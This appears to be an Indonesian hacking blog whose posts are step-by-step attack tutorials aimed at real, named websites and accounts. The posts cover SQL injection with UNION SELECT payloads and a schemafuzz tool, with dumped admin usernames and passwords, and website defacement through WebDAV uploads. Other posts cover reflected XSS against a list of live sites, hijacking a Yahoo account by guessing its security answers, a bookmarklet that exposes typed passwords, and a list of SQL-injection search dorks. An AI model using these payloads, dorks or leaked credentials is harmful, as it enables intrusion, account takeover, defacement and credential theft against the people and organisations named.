Tampilkan postingan dengan label Cracking. Tampilkan semua postingan
Tampilkan postingan dengan label Cracking. Tampilkan semua postingan

Rabu, 29 Februari 2012

Melihat Password Yang Tersimpan di Mozilla (Kloo lage Beruntung)

Pernah kepikiran kgak klo Mozilla ternyata menyimpan hasil password kita..??? Ya pastix Mozilla menyimpanx dan kebetulan ada cara sederhana neh untuk mengetahuix, itu klo kta lagi beruntung seh. Mungkin di artikelku selanjutnya, saia akan menuliskan tentang bagaimana cara membongkar tempat penyimpanan Mozilla. Oya, langsung ke TKP yah :

1) Pertama2 kita buka Mozillax dulu donk..

2) Lalu anda pilih Tools/Pengaturan, lalu klik Options (gambar dibawah)



3) Setelah mengklik options, maka anda akan dibawa ke menu Options, pilih menu Security, lalu pilih saved password



4) Hwaaa, ternyata saia beruntung, banyak username yg terjaring, lalu bagaimana kalo mau ngeliat passwordx�???



5) klo mau liat passwordx, anda tinggal klik Show Password dan �



6) TARAAAM, banyak yah, beres deh�

note : klo lg beruntungx yah� :p


Q-Whil3
No System Is Safe

Sabtu, 14 Januari 2012

Membobol Akun Yahoo Dengan Metode Tebak-tebakan

Sebenarnya artikel ini didasarkan pada sebuah cerita nyata yang terjadi dikala saia sedang bener2 kepepet. Ceritanya ialah pada suatu hari laptop saia abis mengalami kerusakan & data2 saia yg ada dilaptop saia tersebut semuanya ludes ilang entah kemana, padahal didalamnya berisi Laporan Kerja Praktek, Foto2 Penting, Laporan KRCI yg akan dikirim ke Jakarta, dll. 

Nah, pada keesokan harinya, saia lupa kalo saia harus mengirimkan Laporan Kontes Robot ke Jakarta, suer waktu itu saia pusingnya setengah mampus (cuman setengah kok) & saia teringat bahwa sebelum laptop saia rusak, saia pernah mengirimkan laporan tersebut ke email salah satu tutor robot saia dalam bentuk word, tanpa basa-basi saia hubungi tuh tutor saia, tpi blas g ada jawaban & akhirnya muncullah niat jelek saia untuk membobol tuh email tutor saia, tpi gmna caranya saia g tau & akhirnya saia mencoba metode seperti yg akan kita laksanakan berikut ini.

Kita langsung ke TKP :

1 : Kita buka yahoo terlebih dahulu, lalu klik I can't access my account seperti terlihat digambar berikut :



2 : lalu klian pilih I forgot my password, lalu klik next seperti terlihat dibawah ini :



3 : Trus isikan nama email yg akan klian eksekusi & klo sudah, jgn lupa isi kode widget yg disediakan oleh Yahoo, trus klik next deh. Liat gambar dibawah yah :



4 : Lalu klian jawab deh pertanyaan kemanan yg sudah disediakan oleh yahoo dan dipilih oleh pengguna. Makanya saia bilang ini adalah metode tebak-tebakan..



5 : Apabila jawaban anda benar, maka anda akan dibawa kepertanyaan yg kedua seperti dibawah ini..



6 : Klo semua jawaban anda benar, maka anda akan dibawa kehalaman seperti dibawah ini :



7 : Taraaaaaam, kita berhasil. Tinggal kita isikan password baru sesuai kehendak kalian sendiri & secara otomatis, e-mail tersebut akan jadi milik kalian...

8 : Inget, gunakanlah cara ini sebaik mungkin, jgn dibuat untuk tujuan yg aneh. Gunakanlah klo anda bener2 kepepet saja seperti yg saia alami..

Minggu, 08 Januari 2012

SQL Injection Menggunakan Schemafuzz.py

Kali ini saia akan membahas tentang SQL Injection Menggunakan Schemafuzz. Sebelumnya kita sudah melakukan berbagai teknik SQL Injection, baik menggunakan cara manual ataupun menggunakan tools, tapi kali ini kita akan menggunakan sebuah script yg dibuat oleh darkcode dgn bahasa Python. Ok, saia tdk akan berbasa-basi ria lg, kita lngsng ke TKP yow :

Yg kita butuhkan adalah Program Python yg sudah terinstal dikompi/lepi anda serta Schemafuzz jga, silahkan kalian download dilink yg saia siapkan dibawah ini :

Python 27    => Link & kalian jga bisa mencarix di Google kok
Schemafuzz =>  Link & Scriptx

Klo sudah diinstal Pythonx, schemafuzz kalian masukkan kedalam folder Python di drive C..

Kalo sudah selesai, langsung kita jalankan. Caranya :
1 : Klik start >> Run >> CMD
2 : Trus kita masuk ke directory c:\ dengan mengetik CD ../.. <� mundur 2 dir
3 : masuk ke directory Python27 dengan cara ketik �cd Python27? hingga muncul C:\Python27>



4 : Jgn lupa untuk mencari targetx dulu & target yg saia ambil kali ini ialah :

http://www.ilpjitra.gov.my/newsdetails.asp?id=16


5 : Perintah dasar schemafuzzy ini yaitu :

schemafuzz.py -u �target� --perintah


6 : Pertama-tama, kita cek kolomnya dgn perintah 

schemafuzz.py -u http://www.ilpjitra.gov.my/newsdetails.asp?id=16 --findcol


Maka setelah anda menulis script diatas, akan muncul jumlah kolom seperti gambar dibawah ini :


Note : Klo script diatas tidak bisa jalan, maka tambahkanlah tanda (" ") sehingga menjadi :

schemafuzz.py -u "http://www.ilpjitra.gov.my/newsdetails.asp?id=16" --findcol


7 : Ok, sekarang kita lanjut untuk mencari DB, diatas terlihat panjang kolomx ada 10 dan pada tulisan darkcode, itulah celah yg akan kita susupi. Saia menggunakan perintah dibawah ini untuk mengekploitasinya..

schemafuzz.py -u  http://www.ilpjitra.gov.my/newsdetails.asp?id=16+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5,6,7,8,9 --dbs

Hingga muncul hasil :


Nah kan, kita sudah temukan data base site tersebut, database ada 3 :
  1. lpx8
  2. mysql
  3. test
tapi pada penjesalan ini kita akan gunakan database nomor 1


8 : Cari nama table dalam database lpx8 menggunakan perintah :

schemafuzz.py -u http://www.ilpjitra.gov.my/newsdetails.asp?id=16+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5,6,7,8,9 --schema -D lpx8

Hingga Muncul Hasil :


Keluar semua kan kolomnya. Dari sini kita mengetahui bahwa web tersebut memiliki 14 Columns. Sekarang kita tinggal pilih kolom yang akan kita exploit & saia memilih kolom terakhir yaitu tbluser


9 : Sekarang waktunya kita Exploit Tables and Columns dgn perintah dibawah ini :

schemafuzz.py -u http://www.ilpjitra.gov.my/newsdetails.asp?id=16+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5,6,7,8,9 --dump -D lpx8 -T diisi Nama table -C di isi nama columns

Misal saia mau melihat data-data yang ada di columns tbluser, kita menggunakan perintah :

schemafuzz.py -u http://www.ilpjitra.gov.my/newsdetails.asp?id=16+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5,6,7,8,9 --dump -D lpx8 -T tbluser -C Username,Password

Hingga Muncul Hasil seperti di bawah ini :


Nah kan, coba lihat, keluar kan nama Username & Passwordnya :
lpadmin:shazam123 yg berarti username : lpadmin & Passwordx : shazam123, begitu juga seterusnya karena ada 3 user & pass yg berhasil kita jaring.. :)

10 : Nah user and password admin dah ketahuan, untuk login ke adminx, silahkan anda cari sendiri yah, diblog saia jga ada kok artikel yg menuliskan cara mencari letak kolom admin, 

11 : Cara ini hanya berlaku untuk sql versi 5. Untuk versi 4, Harus Manual.


Selamet mencoba & Sukseskan Dunia IT di Indonesia
Q-Whil3

Selasa, 03 Januari 2012

SQL Injection - Pengertian & Uji Coba

Artikel ini dibuat hanya untuk pembelajaran karena kita harus inget �No System Is Safe�. Kata2 itu juga berlaku untuk seluruh website yang ada didunia maya, termasuk blog saia juga sih. Beberapa hari ini saia dimintai tolong untuk melihat sebuah website milik komunitas (kebetulan saia adminx, wkwkwk..!!!!) dan yg terjadi adalah, banyaknya aktivitas2 yg tak dikenal yg berusaha menginject web tersebut dgn berbagai metode termasuk metode yg paling sering digunakan didunia ini untuk mendeface sebuah web, metode itu ialah yg akan kita bahas di artikel ini. Dan untuk itulah timbul pikiran saia untuk membuat artikel ini sebagai bahan pembelajaran dan sharing kepada teman2 smua�

Ok, langsung saja :

Apa sih Sql Injection itu..??? SQL injection adalah jenis aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data (eng: database) di dalam sistem.

Kita langsung mencobanya..

Dork: inurl:news_details.php?id=

Sebagai contoh, kita mendapatkan target berikut :



Sekarang kita akan melakukan pengecekan apakah website tersebut memiliki vulnerability dengan menambahkan tanda ( ) di akhir URL, contohnya sebagai berikut:



Dan terlihat ada tulisan Query Failed qry1..

Setelah kita mengetahui ada vulnerability, maka langkah selanjutkan adalah kita harus mengetahui berapa jumlah kolom yang ada di table tersebut. Kita akan mengetahuinya sampai ada informasi �Query Failed qry1�.

Lakukan pengecekan dengan menggunakan perintah �order by�.

Kita akan mencoba dari 1��..tak terhingga, jadi bisa saja 1,2,3,4,5,6,7,8,9,dst.

Kebetulah dalam target ini hanya terdapat 9 kolom dalam table yang ada di database,

Contohnya:



Langkah pengetesannya adalah :

http://www.pigeon.co.id/news_details.php?newsid=104 order by 1-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 2-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 3-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 4-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 5-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 6-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 7-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 8-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 9-- => No Error

http://www.pigeon.co.id/news_details.php?newsid=104 order by 10-- => Query Failed qry1


Hal tersebut membuktikan bahwa tidak ada kolom ke 10 dalam table tersebut, jadi cuman ada 9 kolom. Langkah selanjutnya adalah, mencari kolom yang dapat di akses!

Kita sudah mengetahui, jumlah kolom adalah 9, kita gunakan perintah �UNION SELECT number,of,columns--� untuk mengatahui kolom mana yang dapat di akses:

Langkah2nya :

http://www.pigeon.co.id/news_details.php?newsid=104 union select 1,2,3,4,5,6,7,8,9--

Maka anda akan menemukan gambar berikut :



Muncul 3 dan 4 kan? Kolom dalam tersebutlah yang bisa anda akses dan anda ambil informasinya. Langkah selanjutnya, mencari informasi versi database.

SQL Injection bekerja baik pada versi 5.* ke atas, untuk mendapatkan informasi database version, kita masukkan saja �@@version�, pada kolom dimana saja yang bisa dipakai.

Misalkan kolom �4? kita ganti dengan �@@version

Contoh :

http://www.pigeon.co.id/news_details.php?newsid=104 union select 1,2,3,@@version,5,6,7,8,9--

Akan muncul versi database 5.0.22-log, ini berarti database bisa di inject



Mengetahui Database Name
Langsung ajah kita replace kolom yang tadi digunakan �3,4? dibagian mana saja, kita gunakan kolom �4?, kita ganti dengan code berikut �group_concat(schema_name)� , dan jangan lupa tambahkan �from information_schema.schemata--� sesudah kolom terakhir.

Contoh :

http://www.pigeon.co.id/news_details.php?newsid=104 union select 1,2,3,group_concat(schema_name),5,6,7,8,9 from information_schema.schemata--



Mengatahui Database Yang Dipakai
Langsung ajah ganti �group_concat(schema_name)� dengan �concat(database())� seperti contoh berikut:

http://www.pigeon.co.id/news_details.php?newsid=104 union select 1,2,3,concat(database()),5,6,7,8,9 from information_schema.schemata--


OK, kita telah mengetahui database yang dipakai saat ini adalah �indocitra�.


Mengetahui Nama Tabel
Langsung aja ganti �group_concat(table_name)� dan tambahkan �from information_schema.tables where table_schema=database()--� setelah kolom terakhir.

Contoh :

http://www.pigeon.co.id/news_details.php?newsid=104 union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database()--



Mengatahui Nama Kolom
Untuk mengetahui nama kolom, kita gunakan 2 query berikut:

group_concat(column_name)

from information_schema.columns where table_schema=database()--

Contoh :

http://www.pigeon.co.id/news_details.php?newsid=104 union select 1,2,3,group_concat(column_name),5,6,7,8,9 from information_schema.columns where table_schema=database()--


Terlihat ada usernama & pass, itu yg akan kita ambil�


Mengambil Informasi Yang Ada Di Dalam Kolom
Ini adalah step akhir, dimana anda akan mendapatkan informasi mengenai isi dari kolom yang berada dalam table di database. Eksekusi perintah berikut:

http://www.pigeon.co.id/news_details.php?newsid=104 union select 1,2,3,group_concat(username,0x3a,pass),5,6,7,8,9 from indocitra.pigeon_admin--


Ok, saia jelaskan maksud script diatas

=> 0x3a adalah nama lain untuk ( : )

=> from indocitra.pigeon admin adalah hasil database yg kita dapatkan distep awal tadi


Dari informasi di atas kita mendapatkan data: �admin_pigeon:5<75nsirf,indocitra:wfnythsin

yg berarti :

username : admin_pigeon

pass : 5<75nsirf  (belum diketahui)

saia masih belum tau apa apakah pass tersebut dienkripsi atau tidak & klo emank dienkripsi, enkripsi apa yg digunakan..???  Mungkin ada yg bisa membantu saia..


Step terakhir ialah mencari letak kolom admin. Setelah saia mencari dengan metode yg Insya Allah saia posting klo ada kesempatan, ternyata kolom adminx terletak di :

http://www.pigeon.co.id/login.php



Ok semua, selamet berkreasi dan sukseskan dunia IT di Indonesia...

Senin, 02 Januari 2012

Mendeface Sebuah Website (Hanya bekerja di Win XP)

Cara ini sama sekali tidak merusak karena kita hanya mensisipkan file yg akan kita jadikan hasil defacean ke web target. Ok langsung saja, Shoot Your Target :

Dork : inurl:�~r00t.txt�

1 : Buka Run (Windws +R) lalu masukkan script ini kedalamnya

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}


Maka anda akan dibawa ke dalam file Web Folder.


2: Cari target Web yg akan anda deface dengan menggunakan dork yg sudah saia beri diatas. Saia mengambil target => www.hbsgjy.com

3: Klo sudah dapat targetx, kita lalu masuk kembali ke file Web Folder lalu klik kanan trus pilih New => Web Folder



4 : Lalu anda akan dibawa ke form seperti dibawah ini :


Isikan web yg akan anda jadikan target kedalam kolom (seperti yg terlihat diatas), lalu klik next. Apabila gagal anda, maka web tersebut tidak bisa dijadikan target dan kita harus mencari web target kita yg laen. Klo bisa/sukses maka kita akan dibawa ke form seperti dibawah ini :



Nah, ternyata kita sekses & tinggal kita klik Finish, lalu terbentuklah sebuah folder seperti gmbar dibawah ini :



5 : Klik 2 kli pada folder yg sudah saia beri tanda bulat dgn cara mengklik 2 kali. Lalu tinggal anda upload file yg ingin anda jadikan bahan deface. Contohnya saia mengupload file khiwil.html



6 : Klo sudah anda upload, untuk menjalankannya tinggal anda klik 2 kli pada file yg kalian upload & TARAAAAM�.



7 : Untuk melihat hasil defacean kalian klik nama web trus tambahkan nama uploadan kalain. Contoh :



Example :
  1. http://www.xyhuacheng.com/khiwil.html
  2. http://www.nssu.co.kr/khiwil.html

Selamat mencoba yah�

Minggu, 01 Januari 2012

XSS (Cross Site Scripting) - Pengertian & Uji Coba

Tadi ada salah satu teman yg bertanya tentang apa itu XSS dan bgaimana penggunaanx. Ok, mungkin saia bisa menjelaskan sedikit. Menurut salah satu web yg ada di Indonesia, XSS itu sendiri mempunyai pengertian suatu cara memasukkan code/script HTM kedalam suatu website dan dijalankan melalui browser di client. XSS merupakan pilihan para newbie (seperti saia) yg tidak mempunyai shell dan sploit, karena untuk melakukanx hanya dibutuhkan sebuah browser. Yg harus diinget adalah XSS hanya memasukan script kedalam URL site target.

Kita langsung uji coba :

Dork : inurl:/gen_confirm.php?errmsg=



Keliatan klo banyak sekali site yg bisa dibuat uji coba & pada kali ini saia mengambil salah satu site milik malaysia..



Coba anda liat address bar & coba anda hapus seluruh script dibelakang errmsg= lalu rubah menjadi <font+color=red+size=8>Q-Whil3</font>

Dan inilah yg terjadi :


Selamat mencoba, karena cara ini tidak berbahaya kok & dibawah ini saia berikan hasil2 web yg sudah saia coba ekploitasi dgn XSS. Let's check this :

  1. http://www.all-from.eu/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
  2. http://www.b2b-now.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
  3. http://www.naukrialert.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
  4. http://www.chinarab.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
  5. http://daviddesoza.chukki-wukki.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
  6. http://www.bangladeshmarketplace.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
  7. http://www.adsdito.com/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
  8. http://www.xeost.com/gen_confirm.php?es_type=prod&id=271&errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E
  9. http://www.crownhr.co.uk/gen_confirm.php?errmsg=%3Cfont+color=red+size=8%3EQ-Whil3%3C/font%3E


Q-Whil3
No System Is Safe

Kamis, 15 Desember 2011

Melihat Password Asterix (*********) Menggunakan Javascript

Sebenarnya ini bukan Script buatan saia, tpi lumayan lah bisa buat kalian2 semua, daripada saia kantongin sendiri jadi g ada gunax deh.. :)

Ini dia Scriptx :

javascript:%20var%20p=r();%20function%20r(){var%20g=0;var%20x=false;var%20x=z(document.forms);g=g+1;var%20w=window.frames;for(var%20k=0;k<w.length;k++)%20{var%20x%20=%20((x)%20||%20(z(w[k].document.forms)));g=g+1;}if%20(!x)%20alert('Password%20not%20found%20in%20'%20+%20g%20+%20'%20forms');}function%20z(f){var%20b=false;for(var%20i=0;i<f.length;i++)%20{var%20e=f[i].elements;for(var%20j=0;j<e.length;j++)%20{if%20(h(e[j]))%20{b=true}}}return%20b;}function%20h(ej){var%20s='';if%20(ej.type=='password'){s=ej.value;if%20(s!=''){prompt('Password%20found%20',%20s)}else{alert('Password%20is%20blank')}return%20true;}}


Dan ini cara penggunaanx :

1) Kita ambil contoh sebuah situs yg lg booming saat ini, Facebook..



2) Masukan E-Mail dan Password :



3) Lalu masukan Script yg ada diatas tadi ke address bar (liat tanda panah)



4) Lalu anda tekan Enter & liat hasilnya



5) Terlihat kan Passwordx�

6) Selesai deh & Script ini jga bisa digunakan dimana aja loh, di Twitter DLL deh� :)

7) Oya, Script ini tdk bsa jalan di Google Chrome loh :(

8) Terakhir, Jgn dibuat yg aneh2 yah..


Q-Whil3
No System Is Safe

Sabtu, 05 November 2011

Kumpulan Dork SQLi -- Part I

Inilah kumpulan dork-dork SQLi yg berhasil saia dapatkan dari berbagai situs dan sudah saia seleksi dari sekian banyak dork yg tersebar di Internet. Klo anda ingin tau apa itu dork, jgn tanya saia, tpi tanyalah kepada mbah Google untuk lebih jelasnya karena saia yakin bahwa mbah Google akan menjawabnya dengan detail, jujur, aktual, tajam, & terpercaya.

Ok temen2 sekalian, daripada saia ngoceh kgak jelas ngalor ngidul, mending langsung ke TKP yah. Silahkan pergunakan dengan baik yah, lets check this :

SQLi
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:".php?id=1"
inurl:".php?cat=1"
inurl:".php?catid=1"
inurl:".php?num=1"
inurl:".php?bid=1"
inurl:".php?pid=1"
inurl:".php?nid=1"
inurl:mod.php?mod=publisher&op=

Dan inilah, the best dork untuk saat ini menurut saia :

allinurl:"union+all+select"